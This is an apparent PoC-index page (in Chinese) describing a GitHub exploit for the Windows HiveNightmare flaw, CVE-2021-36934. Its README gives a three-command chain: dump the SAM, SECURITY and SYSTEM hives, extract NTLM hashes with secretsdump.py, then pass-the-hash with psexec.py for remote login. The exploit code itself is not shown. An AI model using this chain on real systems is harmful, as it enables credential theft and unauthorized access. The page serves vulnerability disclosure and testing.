POC详情: 0a6c9d5b456fc995c3523b0893d62c45ba0d7228

来源
https://github.com/chron1k/oxide_hive
关联漏洞
标题: Microsoft Windows 访问控制错误漏洞 (CVE-2021-36934)
描述:Microsoft Windows是美国微软(Microsoft)公司的一种桌面操作系统。 Microsoft Windows 存在访问控制错误漏洞,该漏洞源于系统对多个系统文件的访问控制列表过于宽松,因此存在特权提升漏洞。成功利用此漏洞的攻击者可以使用SYSTEM权限运行任意代码。
描述
Exploit for CVE-2021-36934
介绍
# Oxide Hive
An exploit for the HiveNightmare/SeriousSAM vulnerability that allows you to read registry hives containing sensitive data without admin privileges. If that doesn't sound like privilege escalation I don't know what does.

# Usage
After building the exploit with `cargo build` and retrieving the binary, deploy it in your testing environment, open CMD and do `.\oxide_hive [max shadow copies]`, the default for shadow copies is 15. The hives SAM, SECURITY and SYSTEM should be dumped to the working directory

From then on you can use [this script](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) with the command `secretsdump.py -sam SAM.dump -security SECURITY.dump -system SYSTEM.dump local` to retrieve the NTLM hashes.
Then you can use [another script](https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py) with the command `psexec.py -hashes <account's hash> <user>@<machine's ip> cmd.exe` to remotely log into any account. Congrats, you just went from unprivileged user to NT Authority with only 3 commands.

# Credits
- @jonasLyk, the person who discovered the vulnerability
- @GossiTheDog, the creator of [the original exploit](https://github.com/GossiTheDog/HiveNightmare) which I took inspiration from
文件快照

 [4.0K]  /data/pocs/0a6c9d5b456fc995c3523b0893d62c45ba0d7228
├── [ 179]  Cargo.toml
├── [1.0K]  LICENSE
├── [1.2K]  README.md
└── [4.0K]  src
    └── [3.7K]  main.rs

1 directory, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。